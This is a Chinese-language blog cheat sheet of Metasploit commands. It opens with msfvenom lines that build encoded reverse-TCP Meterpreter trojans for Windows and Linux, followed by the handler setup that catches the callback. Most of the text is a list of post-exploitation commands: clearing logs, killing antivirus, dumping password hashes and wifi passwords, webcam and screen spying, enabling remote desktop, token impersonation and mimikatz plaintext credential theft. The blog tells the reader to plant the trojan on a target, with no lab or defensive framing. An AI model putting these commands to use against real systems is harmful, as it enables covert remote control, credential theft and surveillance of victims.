msf常用命令
msfvenom:生成payload工具
常用参数:-l查看列表
-p 指定payload
-f指定输出格式
-e指定一个编码方式
-i 指定编码次数
例如生成一个反向tcp的payload:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.139.130 LPORT=4444 -e x86/shikata_ga_nai -I 5 -f exe > 1.exe
上面是生成Windows可执行文件,也可以生成Linux的可执行文件
Msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.139.130 LPORT=4444 -f elf > 1.elf
由上面生成的可执行木马文件可以上传至攻击方,令其执行在本地监听即可:
进入msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.139.130
set LPORT 4444
exploit
然后再被攻击的电脑执行即可获得meterpreter会话窗口:
基础命令
返回命令:background
查看所有会话命令:sessions -l
pessions -i:与指定的会话进行交互
pwd:查看目标当前那目录
lpwd:本地的当前目录
cd :切换指定目录
lcd :切换本地指定目录
ls :列出目标的文件
lls :列出本机当前目录文件
clearev : 清理痕迹
download :将目标文件下载到本地
upload:上传至目标当前目录 :upload 1.exe
execute:在目标执行命令的功能 隐藏执行:execute -f 目标.exe -H
ps : 列出目标进程
getuid: 查看当前用户的身份
getprivs:查看当前权限
migrate :进程迁移
getpid :查看木马进程
shell :进入目标终端环境 会有乱码
chcp 65001解决乱码问题
idletime :查看目标服务空闲时间
sysinfo : 查看目标信息
shutdown:关机
reboot :重启
netstat:查看网络连接情况
ipconfig:查看目标IP信息
getsystem:尝试提权
killav :杀死杀毒软件
run hashdump :到处目标机的密码
run post/windows/wlan/wlan_profile :查看wifi密码
run vnc:实时屏幕监控
run webcam :开启一个摄像头
run post/windows/gather/checkvm:查看是否为虚拟机
run post/windows/gather/enum_computers :查看域内主机
run post/windows/manage/enable_edp:开启对方远程桌面3389
利用help可了解更多
load incognito 然后使用 list_tokens -u 列出令牌
impersonate_token HP-43003395852D\\Administrator :获取指定权限记住要加两个\
mimikatz: load mimikatz进入
help查看帮助
wdigest:抓取明文密码
更新命令:apt update
apt install metasploit-framework
本文地址:https://blog.csdn.net/LTtiandd/article/details/107348015
上一篇: 如何取消页眉页脚方法汇总
下一篇: layui的iframe父子操作方法